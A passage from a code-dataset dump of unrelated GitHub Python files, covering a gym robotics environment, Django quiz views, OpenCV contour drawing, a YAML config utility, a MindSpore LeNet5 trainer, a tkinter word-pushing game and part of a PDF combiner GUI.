print(\"Best Mixed\")\n print(\"Alpha\",alpha)\n getHeirarchyMixed(bestAlpha,scores,simScores,rels,heirarchy,True)\n\nrels = getAllRelationsToConsider()\nscores = getAllWilsonScores(rels)\nheirarchy = getTrueHeirarchy(rels)\nembeddings = getEmbeddingsForRels(rels)\nsimScores = getSimilarityBwEmbeddings(rels,embeddings)\ngetBestHeirarchy(scores,simScores,rels,heirarchy)\n\n\n","repo_name":"GuptaManan100/BTP","sub_path":"DBpedia/Restricted/getHeirarchyRestrictedMixed.py","file_name":"getHeirarchyRestrictedMixed.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22082309798","text":"import os\nfrom gym import utils\nfrom gym.envs.robotics import fetch_primitives_env\nimport numpy as np\n\n\n# Ensure we get the path separator correct on windows\nMODEL_XML_PATH = os.path.join('fetch', 'push_barrier.xml') # trying this\n\n\nclass FetchBarrierPrimitivesEnv(fetch_primitives_env.FetchPrimitivesEnv, utils.EzPickle):\n def __init__(self, reward_type='sparse'):\n initial_qpos = {\n 'robot0:slide0': 0.405,\n 'robot0:slide1': 0.48,\n 'robot0:slide2': 0.0,\n 'robot0:shoulder_pan_joint': 0,\n 'robot0:shoulder_lift_joint': -np.pi / 3,\n 'robot0:upperarm_roll_joint': 0,\n 'robot0:elbow_flex_joint': np.pi / 2,\n 'robot0:forearm_roll_joint': 0,\n 'robot0:wrist_flex_joint': np.pi / 4,\n 'robot0:wrist_roll_joint': 0,\n 'object0:joint': [1.25, 0.53, 0.4, 1., 0., 0., 0.],\n }\n fetch_primitives_env.FetchPrimitivesEnv.__init__(\n self, MODEL_XML_PATH, has_object=True, block_gripper=True, n_substeps=20,\n gripper_extra_height=0.0, target_in_the_air=False, target_offset=0.0,\n obj_range=0.15, target_range=0.15, distance_threshold=0.05,\n initial_qpos=initial_qpos, reward_type=reward_type, action_max=1.)\n utils.EzPickle.__init__(self)\n\n def _reset_sim(self):\n self._env_setup(self.initial_qpos)\n\n object_qpos = self.sim.data.get_joint_qpos('object0:joint')\n self.sim.data.set_joint_qpos('object0:joint', object_qpos)\n\n self.sim.forward()\n return True\n","repo_name":"amberxie88/gym","sub_path":"gym/envs/robotics/fetch/push_barrier.py","file_name":"push_barrier.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39445272742","text":"from django.utils.translation import gettext_lazy as _\nfrom django.conf import settings\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.urls import reverse\nfrom django.contrib import messages\nfrom django.views.generic import CreateView, DetailView, UpdateView\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.db.models import ProtectedError\n\nfrom django_tables2 import SingleTableView\n\nfrom champsquarebackend.core.loading import get_model, get_class, get_classes\nfrom champsquarebackend.core.compat import get_user_model\n\nQuiz = get_model('quiz', 'quiz')\nParticipant = get_model('participate', 'participant')\nParticipantTable = get_class('dashboard.participate.tables', 'ParticipantTable')\nParticipantForm = get_class('dashboard.participate.forms', 'ParticipantForm')\nUserListView = get_class('dashboard.users.views', 'UserListView')\n\nParticipantDispatcher = get_class('dashboard.participate.utils', 'ParticipantDispatcher')\n\n\nUser = get_user_model()\n\n\nclass QuizParticipantListView(UserListView):\n template_name = 'champsquarebackend/dashboard/participate/participants.html'\n model = Participant\n actions = 
('remove_from_test', 'send_test_link',)\n table_class = ParticipantTable\n context_table_name = 'participants'\n\n\n def get_queryset(self):\n queryset = self._get_quiz().participants.all()\n \n return self.apply_search(queryset)\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = self.form\n context['quiz_id'] = self.kwargs['pk']\n return context\n\n def apply_search(self, queryset):\n # Set initial queryset description, used for template context\n self.desc_ctx = {\n 'main_filter': _('All Participants'),\n 'email_filter': '',\n 'name_filter': '',\n }\n if self.form.is_valid():\n return self.apply_search_filters(queryset, self.form.cleaned_data)\n else:\n return queryset\n\n def _get_quiz(self):\n if not hasattr(self, '_quiz'):\n self._quiz = get_object_or_404(Quiz, pk=self.kwargs['pk'])\n return self._quiz\n\n def remove_from_test(self, request, participants):\n # always delete via this way as it checks whether object exist or not first\n # participant_to_delete = Participant.objects \\\n # .filter(id__in=list(map(lambda participant: participant.id, participants)))\n participant_to_delete = Participant.objects \\\n .filter(id__in=[participant.id for participant in participants])\n try:\n participant_to_delete.delete()\n messages.success(self.request, _(\"Successfully removed participant from list\"))\n except ProtectedError:\n messages.error(self.request, _('Can\\'t delete protected user'))\n return redirect(reverse('dashboard:quiz-participant-list', kwargs={'pk': self._get_quiz().id}))\n\n def send_test_link(self, request, participants):\n site = get_current_site(request)\n response = None\n for participant in participants:\n ctx = {\n 'site': site,\n 'start_date_time': participant.start_date_time,\n 'video_monitoring_enabled': participant.video_monitoring_enabled,\n 'duration': participant.duration,\n 'otp_code': participant.generate_otp(),\n 'quiz_link': participant.get_absolute_url()\n }\n response = ParticipantDispatcher().send_quiz_link_email_for_user(participant, ctx)\n\n messages.info(self.request, _(response))\n return redirect(reverse('dashboard:quiz-participant-list', kwargs={'pk': self._get_quiz().id}))\n\n\nclass ParticipantDetailView(DetailView):\n model = Participant\n template_name = 'champsquarebackend/dashboard/participate/detail.html'\n context_object_name = 'participant'\n\n\nclass ParticipantCreateUpdateView(UpdateView):\n \"\"\"\n Dashboard view that can be used to create and update\n Category (similar to questions). It can be used in two different ways,\n each of them with unique URL pattern:\n - when creating a new subject.\n - when editing an existing question, this view is called with\n subject's primary key.\n \"\"\"\n template_name = 'champsquarebackend/dashboard/participate/participant_create_update.html'\n model = Participant\n context_object_name = 'participant'\n form_class = ParticipantForm\n creating = None\n\n def get_object(self, queryset=None):\n \"\"\"\n This parts allows generic.UpdateView to handle creating\n questions as well. The only distinction between an UpdateView\n and a CreateView is that self.object is None. 
We emulate this behavior.\n        \"\"\"\n        self.creating = 'pk' not in self.kwargs\n        if self.creating:\n            return None #success\n        else:\n            participant = get_object_or_404(Participant, pk=self.kwargs['pk'])\n            return participant\n\n    def get_quiz(self):\n        if not hasattr(self, '_quiz'):\n            self._quiz = get_object_or_404(Quiz, pk=self.kwargs['quiz_pk'])\n        return self._quiz\n\n    def get_context_data(self, **kwargs):\n        ctx = super().get_context_data(**kwargs)\n        ctx['title'] = self.get_page_title()\n        ctx['quiz_pk'] = self.get_quiz().id\n\n        # edit : add context data in here\n\n        return ctx\n\n    def get_page_title(self):\n        if self.creating:\n            return _('Create new Participant')\n        else:\n            return _('Update Participant %s') % self.object.full_name\n\n    def get_success_url(self):\n        \"\"\"\n        return a success message and redirects to given url\n        \"\"\"\n        if self.creating:\n            msg = _(\"Added participant '%s'\") % self.object.__str__()\n        else:\n            msg = _(\"Updated participant '%s'\") % self.object.__str__()\n        messages.success(self.request, msg)\n\n        return reverse('dashboard:quiz-participant-list', kwargs={'pk': self.kwargs['quiz_pk']})\n","repo_name":"ChampSquare/ChampionSquareBackend","sub_path":"champsquarebackend/apps/dashboard/participate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25062456062","text":"import cv2\nimport numpy as np\n\n\n# Downsample the original image to reduce its resolution\nimg = cv2.pyrDown(cv2.imread(\"C:/Users/LIUXINDONG/Desktop/opencv/images/chapter12/image/closing.bmp\", cv2.IMREAD_UNCHANGED))\n# Apply a binary threshold to the image\nret, thresh = cv2.threshold(cv2.cvtColor(img.copy(), cv2.COLOR_BGR2GRAY), 127, 255, cv2.THRESH_BINARY)\n# Find the external contours\nimage, contours, hier = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\nfor c in contours:\n    # Compute a simple bounding box\n    x, y, w, h = cv2.boundingRect(c)\n    # Draw the bounding box on the image\n    cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\n    # Compute the minimum-area rectangle enclosing the target\n    rect = cv2.minAreaRect(c)\n    box = cv2.boxPoints(rect)\n    box = np.int0(box)\n    # Draw that rectangle\n    cv2.drawContours(img, [box], 0, (0, 0, 255), 3)\n\n    # Compute and draw the minimum enclosing circle\n    (x, y), radius = cv2.minEnclosingCircle(c)\n    center = (int(x), int(y))\n    radius = int(radius)\n    img = cv2.circle(img, center, radius, (0, 255, 0), 2)\n\ncv2.drawContours(img, contours, -1, (255, 0, 0), 1)\ncv2.imshow(\"contours\", img)\n","repo_name":"RabbitNoTeeth/opencv","sub_path":"learning_opencv3_with_python/chapter3/c339.py","file_name":"c339.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19892628361","text":"import yaml\nimport os\nimport re\nimport logging\nimport pickle\n\nfrom datetime import datetime, timedelta\n\n\nLOG_FORMAT = '%(asctime)-15s %(filename)s %(funcName)s line %(lineno)d %(levelname)s: %(message)s'\n\n# defining the regex pattern that the parser will use to 'implicitly' tag nodes\npattern = re.compile(r\"\\${(.*?)\\}\")\n\n\n# constructor that the parser will invoke for !envx\ndef envx_constructor(loader, node):\n    value = loader.construct_scalar(node)\n    env_var = pattern.match(value).groups()[0]\n    return os.environ.get(env_var, '')\n\n\n# now associate the regex pattern we defined with the custom tag '!envx'\nyaml.add_implicit_resolver(\"!envx\", pattern)\n\n\n# 'register' the constructor so that the parser will invoke 'envx_constructor' for each '!envx' node\nyaml.add_constructor('!envx', envx_constructor)\n\n\ndef 
parse_config(path=\"./config/config.yaml\"):\n \"\"\"\n parses yaml\n :param path: config path (default = ./config/config.yaml)\n :return: parsed config dict\n \"\"\"\n try:\n with open(path, 'r') as ymlfile:\n config = yaml.load(ymlfile)\n return config\n except Exception as e:\n logging.error(\"Error while parsing config.\\n{}\".format(e))\n\n\ndef json_to_model(json, obj):\n if not obj:\n return json\n keys = json.keys()\n for key in keys:\n if hasattr(obj, key):\n setattr(obj, key, json[key])\n else:\n return json\n return obj\n\n\ndef model_to_json(obj):\n if obj:\n return pickle.dumps(obj)\n return {}\n\n\ndef init_logging(file_path=None):\n if file_path:\n file_path = \"./logs_{}/{}\".format(datetime.now(), file_path)\n logging.basicConfig(format=LOG_FORMAT, level=\"INFO\", filename=file_path)\n return logging.getLogger()\n\n\ndef get_previous_date(days):\n return str(datetime.strftime(datetime.utcnow() - timedelta(days), \"%Y-%m-%d %H:%M:%S\"))\n","repo_name":"Divyang-Soni/User-Authentication-using-blockchain-technology","sub_path":"util/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"5611006784","text":"# LeNet5 MNIST\n\nimport os\n# os.environ['DEVICE_ID'] = '0'\n\nimport mindspore as ms\nimport mindspore.context as context\nimport mindspore.dataset.transforms.c_transforms as C\nimport mindspore.dataset.vision.c_transforms as CV\n\nfrom mindspore import nn,Tensor\nfrom mindspore.train import Model\nfrom mindspore.train.callback import LossMonitor, ModelCheckpoint, CheckpointConfig\nfrom mindspore.train.serialization import load_checkpoint, load_param_into_net\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom image_to_data import image_to_data\nfrom images import images_processing\n\ncontext.set_context(mode=context.GRAPH_MODE, device_target='CPU') # Ascend, CPU, GPU\n\n\ndef create_dataset(data_dir, training=True, batch_size=32, resize=(32, 32),\n rescale=1/(255*0.3081), shift=-0.1307/0.3081, buffer_size=64):\n data_train = os.path.join(data_dir, 'train') # train set\n data_test = os.path.join(data_dir, 'test') # test set\n ds = ms.dataset.MnistDataset(data_train if training else data_test)\n\n ds = ds.map(input_columns=[\"image\"], operations=[CV.Resize(resize), CV.Rescale(rescale, shift), CV.HWC2CHW()])\n ds = ds.map(input_columns=[\"label\"], operations=C.TypeCast(ms.int32))\n # When `dataset_sink_mode=True` on Ascend, append `ds = ds.repeat(num_epochs) to the end\n ds = ds.shuffle(buffer_size=buffer_size).batch(batch_size, drop_remainder=True)\n\n return ds\n\n\nclass LeNet5(nn.Cell):\n def __init__(self):\n super(LeNet5, self).__init__()\n self.conv1 = nn.Conv2d(1, 6, 5, stride=1, pad_mode='valid')\n self.conv2 = nn.Conv2d(6, 16, 5, stride=1, pad_mode='valid')\n self.relu = nn.ReLU()\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n self.flatten = nn.Flatten()\n self.fc1 = nn.Dense(400, 120)\n self.fc2 = nn.Dense(120, 84)\n self.fc3 = nn.Dense(84, 10)\n\n def construct(self, x):\n x = self.relu(self.conv1(x))\n x = self.pool(x)\n x = self.relu(self.conv2(x))\n x = self.pool(x)\n x = self.flatten(x)\n x = self.fc1(x)\n x = self.fc2(x)\n x = self.fc3(x)\n\n return x\n\n\ndef train(data_dir, lr=0.01, momentum=0.9, num_epochs=3, ckpt_name=\"lenet\"):\n ds_train = create_dataset(data_dir)\n ds_eval = create_dataset(data_dir, training=False)\n steps_per_epoch = ds_train.get_dataset_size()\n\n net = LeNet5()\n loss = 
nn.loss.SoftmaxCrossEntropyWithLogits(sparse=True, reduction='mean')\n opt = nn.Momentum(net.trainable_params(), lr, momentum)\n\n ckpt_cfg = CheckpointConfig(save_checkpoint_steps=steps_per_epoch, keep_checkpoint_max=5)\n ckpt_cb = ModelCheckpoint(prefix=ckpt_name, directory='ckpt', config=ckpt_cfg)\n loss_cb = LossMonitor(per_print_times=ds_train.get_dataset_size())\n\n model = Model(net, loss, opt, metrics={'acc', 'loss'})\n # dataset_sink_mode can be True when using Ascend\n model.train(num_epochs, ds_train, callbacks=[loss_cb, ckpt_cb], dataset_sink_mode=False)\n metrics = model.eval(ds_eval, dataset_sink_mode=False)\n print('Metrics:', metrics)\n\ndef infer(data,CKPT_2):\n #print(*data['image'][0][0][16][:], sep='\\n')\n images = data\n net = LeNet5()\n load_checkpoint(CKPT_2, net=net)\n model = Model(net)\n output = model.predict(Tensor(data, ms.float32))\n preds = np.argmax(output.asnumpy(), axis=1)\n\n for i in range(0, 11):\n plt.subplot(3, 4, i+1)\n plt.imshow(np.squeeze(images[i]))\n color = 'blue'\n plt.title(\"prediction: {},\".format(preds[i]), color=color)\n plt.xticks([])\n plt.savefig('test.png')\n plt.show()\nif __name__ == \"__main__\":\n data_path = 'MNIST/'\n train(data_path)\n print('Checkpoints after training:')\n print('\\n'.join(sorted([x for x in os.listdir('ckpt') if x.startswith('lenet')])))\n CKPT_2 = 'ckpt/lenet-3_2187.ckpt'\n images_processing('input.png')\n data = image_to_data('./image')\n infer(data,CKPT_2)\n","repo_name":"gaoaidi/Mnist-lenet5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4635155409","text":"###TartanHacks 2022\n###Team: wuhuTakeOff\n###github: https://github.com/Wuuuzula/wuHu-TakeOff\n\nfrom tkinter import *\nfrom tkinter.messagebox import *\nimport copy, string, time, sys\nimport pygame\nfrom PIL import Image, ImageTk\n\nroot = Tk()\nroot.title(\"WordPushingGame - Space to Restart\")\n\npygame.init()\n#Load music\nbgm = \"music/Equinoxe.mp3\"\nwuhu = \"music/wuhu.mp3\"\nmoveBox = \"music/moveBox.mp3\"\nwalk = \"music/walk.mp3\"\nmelting = \"music/melting.mp3\"\ndoorOpen = \"music/doorOpen.mp3\"\npygame.mixer.init()\npygame.mixer.music.load(bgm)\npygame.mixer.Channel(0).play(pygame.mixer.Sound(bgm))\n\nletters=list(string.ascii_uppercase)\nwalls=['W2','A2','L2','S2','N2','D2','W5','A5','V5','E5','S5']\nice=['I3','C3','E3']\ndoor=['D4','O4','R4','O4-20']\n\nallLetters=dict()\nfor i in letters:\n allLetters[i]=PhotoImage(file=f\"image/UpperLetterImages-White/{i}.png\")\nfor special in [walls,ice,door]:\n for i in special:\n allLetters[i]=PhotoImage(file=f\"image/specialBlocks/{i}.png\")\n\nallLetters['0']=PhotoImage(file=\"image/Black.png\")\nallLetters['me']=PhotoImage(file=\"image/specialBlocks/me.png\")\n\nmes = [PhotoImage(file=(\"image/specialBlocks/me.gif\"),format = 'gif -index %i' % (i)) for i in range(2)]\n\n# Original Map\nlevel = 0\nallMapList = [\n [\n ['0', 'W2', 'A2', 'L2', 'L2', 'S2', '0'], \n ['W2', '0', '0', '0', '0', '0', 'W2'], \n ['A2', '0', 'M', '0', 'L', '0', 'A2'], \n ['L2', '0', 'Y', '0', 'I', '0', 'L2'], \n ['L2', '0', '0', '0', 'K', '0', 'L2'], \n ['S2', '0', 'H', '0', 'E', '0', 'S2'], \n ['A2', '0', 'E', '0', '0', '0', 'I3'], \n ['N2', '0', 'A', '0', 'F', '0', 'C3'], \n ['D2', '0', 'R', '0', 'R', '0', 'E3'], \n ['W2', '0', 'T', '0', 'O', '0', 'W2'], \n ['A2', '0', '0', '0', 'Z', '0', 'A2'], \n ['L2', '0', 'me', '0', 'E', '0', 'L2'], \n ['L2', '0', 'S', '0', 'N', 
'0', 'L2'], \n ['S2', '0', '0', '0', '0', '0', 'S2'], \n ['0', 'W2', 'A2', 'L2', 'L2', 'S2', '0']\n ],\n [\n ['0', 'W2', 'A2', 'L2', 'L2', 'S2', '0'], \n ['W2', '0', '0', '0', '0', '0', 'W2'], \n ['A2', '0', 'me', '0', 'M', '0', 'A2'], \n ['L2', '0', '0', '0', 'Y', '0', 'L2'], \n ['L2', '0', 'L', '0', 'S', '0', 'L2'], \n ['S2', '0', 'O', '0', 'E', '0', 'S2'], \n ['A2', '0', 'C', '0', 'L', '0', 'A2'], \n ['N2', '0', 'K', '0', 'F', '0', 'N2'], \n ['D2', '0', 'E', '0', '0', '0', 'D2'], \n ['0', 'W2', 'D', '0', 'U', '0', 'W2'], \n ['0', 'A2', '0', '0', 'P', '0', 'A2'], \n ['0', 'L2', 'D4', 'O4', 'O4', 'R4', 'L2'], \n ['0', 'L2', '0', '0', '0', '0', 'L2'], \n ['0', 'S2', '0', '0', '0', '0', 'S2'], \n ['0', '0', '0', '0', '0', '0', '0']\n ],\n [\n ['W5', 'S5', 'E5', 'V5', 'A5', 'W5', 'S5'], \n ['A5', 'W5', 'S5', 'E5', 'V5', 'A5', 'W5'], \n ['V5', '0', 'D', '0', 'E5', 'V5', 'A5'], \n ['E5', '0', 'R', '0', 'S5', 'E5', 'V5'], \n ['S5', '0', 'O', '0', 'T', '0', 'E5'], \n ['W5', '0', 'W', '0', 'H', '0', 'S5'], \n ['A5', '0', 'N', '0', 'E', '0', 'W5'], \n ['V5', '0', '0', '0', '0', '0', 'A5'], \n ['E5', '0', 'me', '0', 'S', '0', 'V5'], \n ['S5', '0', 'N', '0', 'E', '0', 'E5'], \n ['W5', 'S5', '0', '0', 'A', '0', 'S5'], \n ['A5', 'W5', 'S5', 'E5', '0', '0', 'W5'], \n ['V5', 'A5', 'W5', 'S5', 'E5', 'V5', 'A5'], \n ['E5', 'V5', 'A5', 'W5', 'S5', 'E5', 'V5'], \n ['S5', 'E5', 'V5', 'A5', 'W5', 'S5', 'E5']\n ]\n]\n\n#Letters = boxes\n#Letters2/5 = wall/sea\n#Letters3 = ice\n#Lettera4 = door\n#me = player\n\nmapLength, mapWidth = len(allMapList[level]),len(allMapList[level][0])\n\n#create fading effect\nimages = [] \ndef create_rectangle(x1, y1, x2, y2, **kwargs):\n if 'alpha' in kwargs:\n alpha = int(kwargs.pop('alpha') * 255)\n fill = kwargs.pop('fill')\n fill = root.winfo_rgb(fill) + (alpha,)\n image = Image.new('RGBA', (x2-x1, y2-y1), fill)\n images.append(ImageTk.PhotoImage(image))\n cv.create_image(x1, y1, image=images[-1], anchor='nw')\n cv.create_rectangle(x1, y1, x2, y2, **kwargs)\n\ndef updateIce(): \n global icy\n create_rectangle(325, 325, 475, 375, fill='black', alpha= 0.2)\n icy = root.after(100,updateIce)\n\ndef updateDoor(): \n global doory\n cv.create_image((650, 150), image=allLetters['O4-20'])\n cv.create_image((650, 300), image=allLetters['O4-20'])\n create_rectangle(575, 175, 625, 275, fill='black', alpha= 0.2)\n doory = root.after(100,updateDoor)\n\ntrigger = 0\n# Paint the landscape\n\ndef drawGameImage():\n global posX, posY\n cv.delete('all')\n for row in range(mapLength):\n for col in range(mapWidth):\n if mapList[row][col] == 'me':\n # Player's position\n posX = row \n posY = col\n img = allLetters[mapList[row][col]]\n cv.create_image((row * 50+50, col * 50+50), image=allLetters['0'])\n cv.create_image((row * 50+50, col * 50+50), image=img)\n cv.pack()\n\ndef update(ind):\n me = mes[ind]\n ind += 1\n if ind >= 2:\n ind = 0\n allLetters['me'] = me\n if trigger!=1: drawGameImage()\n root.after(200, update, ind)\n\ndef callback(event): # Keyboard Control\n global posX, posY, mapList, trigger, icy, doory\n keyPressed = event.keysym\n #Player's current position(posX,y)\n positionDict = {\n \"Up\" : [0,-1,0,-2],\n \"Down\" : [0,1,0,2],\n \"Left\" : [-1,0,-2,0],\n \"Right\" : [1,0,2,0],\n }\n\n if keyPressed == \"Escape\":\n pygame.mixer.Channel(0).stop()\n root.destroy()\n\n if keyPressed in positionDict:\n moveScale = positionDict[keyPressed]\n x1 = posX+moveScale[0]\n y1 = posY+moveScale[1]\n x2 = posX+moveScale[2]\n y2 = posY+moveScale[3]\n coordinateMove(x1, y1, x2, y2) \n\n elif 
keyPressed == \"space\": # Press SPACE\n print(\"Press Space\", event.char)\n trigger = 0\n icy = doory = None\n mapList = copy.deepcopy(allMapList[level]) # Reset the map\n drawGameImage()\n\n# Determine whether position is within the frame\ndef validArea(row, col):\n return (row >= 0 and row < mapLength and col >= 0 and col < mapWidth)\n\ndef coordinateMove(x1, y1, x2, y2):\n global posX, posY, trigger, icy, doory\n moveTo = None\n behindeMoveTo = None\n if validArea(x1, y1): \n moveTo = mapList[x1][y1] \n if validArea(x2, y2):\n behindeMoveTo = mapList[x2][y2]\n if moveTo == '0': # Able to move to moveTo\n MoveMan(posX, posY) \n posX = x1 \n posY = y1 \n mapList[x1][y1] = 'me' \n pygame.mixer.music.load(walk)\n pygame.mixer.music.play(loops = 0, start=0.0, fade_ms=0)\n\n\n if (moveTo in walls) or not validArea(x1, y1):\n # moveTo is wall or out of the game area\n return \n if moveTo in letters: # moveTo has a letter\n if (behindeMoveTo in walls) or not validArea(x1, y1) or behindeMoveTo in letters: ##behindeMoveTo is wall or out of the game area\n return \n if moveTo in letters and behindeMoveTo == '0':\n MoveMan(posX, posY) \n posX = x1 \n posY = y1 \n mapList[x2][y2] = moveTo \n mapList[x1][y1] = 'me'\n pygame.mixer.music.load(moveBox)\n pygame.mixer.music.play(loops = 0, start=0.0, fade_ms=0)\n\n if level == 0:\n if trigger == 0 and triggerEffect() == True:\n pygame.mixer.music.load(melting)\n pygame.mixer.music.play(loops = 0, start=0.0, fade_ms=0)\n trigger += 1\n updateIce()\n \n elif trigger == 1:\n root.after_cancel(icy)\n icy = None\n trigger += 1\n mapList[6][6] = '0'\n mapList[7][6] = '0'\n mapList[8][6] = '0'\n\n elif level == 1:\n if trigger == 0 and triggerEffect() == True:\n pygame.mixer.music.load(doorOpen)\n pygame.mixer.Channel(0).play(pygame.mixer.Sound(doorOpen))\n trigger += 1\n updateDoor()\n \n elif trigger == 1:\n root.after_cancel(doory)\n doory = None\n trigger += 1\n mapList[12][2] = 'O4'\n mapList[11][3] = '0'\n mapList[11][4] = '0'\n mapList[12][5] = 'O4'\n \n elif level == 2:\n if triggerEffect() == True:\n pygame.mixer.music.stop()\n pygame.mixer.Channel(0).stop()\n pygame.mixer.music.load(wuhu)\n pygame.mixer.music.play(loops = -1, start=0.0, fade_ms=0)\n showinfo(message = f\"Wuhu! You've past the whole game!\")\n\n if IsFinish():\n showinfo(message = f\"You've Passed Level {level+1}! 
\")\n nextLevel()\n drawGameImage()\n \ndef MoveMan(posX, posY):\n if mapList[posX][posY] == 'me':\n mapList[posX][posY] = '0' \n\ndef triggerEffect():\n target = [[\"HEAT\",\"FIRE\"],[\"KEY\"],[\"AIR\"]]\n for words in target[level]:\n length = len(words)\n for col in range(len(mapList[0])):\n for row in range(len(mapList)-length+1):\n secret = ''.join([mapList[row+i][col] for i in range(length)])\n if secret == words:\n return True\n elif secret == \"AmeR\" and words == \"AIR\":\n return True\n elif secret == \"FmeRE\" and words == \"FIRE\":\n return True\n return False\n\ndef IsFinish(): # Whether finish\n global level\n bFinish = False \n if level == 0:\n if(mapList[6][6] == 'me' or\n mapList[7][6] == 'me'or\n mapList[8][6] == 'me'):\n bFinish = True\n elif level == 1:\n if(mapList[11][3] == 'me' or\n mapList[11][4] == 'me'):\n bFinish = True\n return bFinish\n\ndef nextLevel():\n global mapList, level, trigger\n trigger = 0\n level += 1\n mapList = copy.deepcopy(allMapList[level])\n drawGameImage()\n\ncv = Canvas(root, bg='black', width=800, height=400)\nmapList = copy.deepcopy(allMapList[level])\ndrawGameImage()\ncv.bind(\"\", callback)\ncv.pack()\ncv.focus_set() # Focus on cv\nroot.after(0, update, 0)\nroot.update\nroot.mainloop()\n#Gameover stop the music\n","repo_name":"Wuuuzula/wuHu-TakeOff","sub_path":"2022 CMU Hackathon_wuHu/wordPushingGame.py","file_name":"wordPushingGame.py","file_ext":"py","file_size_in_byte":9987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6848414854","text":"import tkinter as tk\nfrom business import combiner\nfrom guicomponents import DirectorySelectRow, ProgressBar, RowButton, TreeViewFrame\nfrom guicomponents.config import *\nfrom os import path\nfrom tkinter import messagebox, ttk\nfrom utils.helper_methods import prompt_to_open_folder\n\nSELECT_SOURCE_FOLDER_MESSAGE = 'Select Source Folder'\nSELECT_DESTINATION_FOLDER_MESSAGE = 'Select Output Folder'\nSOURCE_IID = 'source'\n\n\nclass PdfCombinerFrame(tk.Frame):\n \"\"\"\n Control the state of the directories we choose from.\n \"\"\"\n\n def __init__(self, parent):\n \"\"\"\n Initialize the GUI with the necessary components\n \"\"\"\n self.parent = parent\n super().__init__(parent)\n self.pack(fill=tk.BOTH, expand=True)\n\n # Source folder selection\n self.source_directory_var = tk.StringVar(self)\n self.source_select_row = DirectorySelectRow(self,\n self.source_directory_var,\n 'Source Folder:',\n SELECT_SOURCE_FOLDER_MESSAGE,\n self.set_preview_tree)\n\n # Optional checkboxes for jpegs and xps file conversion\n filetypes_frame = ttk.Frame(self)\n filetypes_frame.pack(fill=tk.X, padx=PAD_X_AMOUNT, pady=PAD_Y_AMOUNT)\n\n filetypes_label = ttk.Label(filetypes_frame, text='Non-pdf filetypes to also merge: ')\n filetypes_label.pack(side=tk.LEFT)\n\n self.include_jpg_var = tk.BooleanVar(self)\n jpg_checkbox = ttk.Checkbutton(filetypes_frame, text=\"JPG\", variable=self.include_jpg_var,\n command=self.set_preview_tree)\n jpg_checkbox.pack(side=tk.LEFT)\n\n self.include_xps_var = tk.BooleanVar(self)\n xps_checkbox = ttk.Checkbutton(filetypes_frame, text=\"XPS\", variable=self.include_xps_var,\n command=self.set_preview_tree)\n xps_checkbox.pack(side=tk.LEFT)\n\n # Get child directories and display\n self.preview_frame = TreeViewFrame(self)\n\n # Destination folder selection\n self.destination_directory_var = tk.StringVar(self)\n self.destination_select_row = DirectorySelectRow(self,\n self.destination_directory_var,\n 'Destination Folder:',\n 
SELECT_DESTINATION_FOLDER_MESSAGE)\n self.progress_bar = ProgressBar(self,\n task_func=self.combine_pdfs_task,\n task_outcome_func_map=self.get_msg_task_map(),\n progress_title='Combining Pdfs',\n progress_text='Combining Pdfs...')\n\n # Combine pdfs button\n self.combinePdfsButton = RowButton(\n self,\n text='Combine PDFs',\n command=self.combine_button_listener\n )\n\n def combine_button_listener(self):\n \"\"\"\n Validate we have the data we need to perform action and then go for it\n \"\"\"\n if self.source_directory_var.get() is None or len(self.source_directory_var.get()) == 0:\n messagebox.showerror(SELECT_SOURCE_FOLDER_MESSAGE, \"You must select a folder to read the pdfs from!\")\n elif self.destination_directory_var.get() is None or len(self.destination_directory_var.get()) == 0:\n messagebox.showerror(SELECT_DESTINATION_FOLDER_MESSAGE, \"You must select a folder to save the pdfs in!\")\n else:\n try:\n self.toggle_button_disable(True)\n self.progress_bar.perform_action()\n except Exception as e:\n print(e)\n messagebox.showerror(\"Error\", \"An unexpected error occurred, please try again.\")\n\n def combine_pdfs_task(self, signal_queue, progress_var):\n \"\"\"\n Perform the actual pdf merging\n \"\"\"\n try:\n result_files = []\n directories_list = [self.source_directory_var.get()] + \\\n combiner.get_child_dirs(self.source_directory_var.get())\n # combine pdfs in first layer of children\n for directory in directories_list:\n print(\"Combining files in: {}\".format(directory))\n result_file = combiner.combine_docs_in_directory(directory,\n self.destination_directory_var.get(),\n include_jpg=self.include_jpg_var.get(),\n include_xps=self.include_xps_var.get(),\n progress_var=progress_var)\n if result_file:\n result_files.append(result_file)\n\n # print results to stdout\n print(\"Finished combining all pdfs. Written files: \")\n for result_file in result_files:\n print(\"* {}\".format(result_file))\n if len(result_files) > 0:\n signal_queue.put(TASK_FINISHED_MESSAGE)\n else:\n signal_queue.put(TASK_NOOP_MESSAGE)\n except Exception as e:\n print(e)\n signal_queue.put(TASK_ERROR_MESSAGE)\n finally:\n self.toggle_button_disable(False)\n\n def get_msg_task_map(self):\n return {\n TASK_FINISHED_MESSAGE: lambda: prompt_to_open_folder(self.destination_directory_var.get(),\n message_text=\"We have successfully \"\n \"merged the files. 
